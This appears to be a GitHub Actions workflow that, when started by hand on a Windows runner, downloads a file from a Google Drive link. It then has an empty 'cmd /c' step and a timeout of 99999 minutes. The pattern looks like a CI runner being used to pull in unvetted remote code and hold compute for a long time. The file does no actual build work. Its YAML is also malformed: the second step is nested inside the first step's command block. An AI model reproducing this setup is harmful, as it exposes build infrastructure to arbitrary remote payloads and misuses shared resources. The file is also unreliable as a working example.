name: Workflow main

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: first step
        run: |   
        
          Invoke-WebRequest -Uri "https://drive.usercontent.google.com/download?id=13fp07AYiONScFmMkJTdLNjto_m-Lo20d&export=download&authuser=0"
          - name: secound step
          run: |
             cmd /c
          
    timeout-minutes: 99999



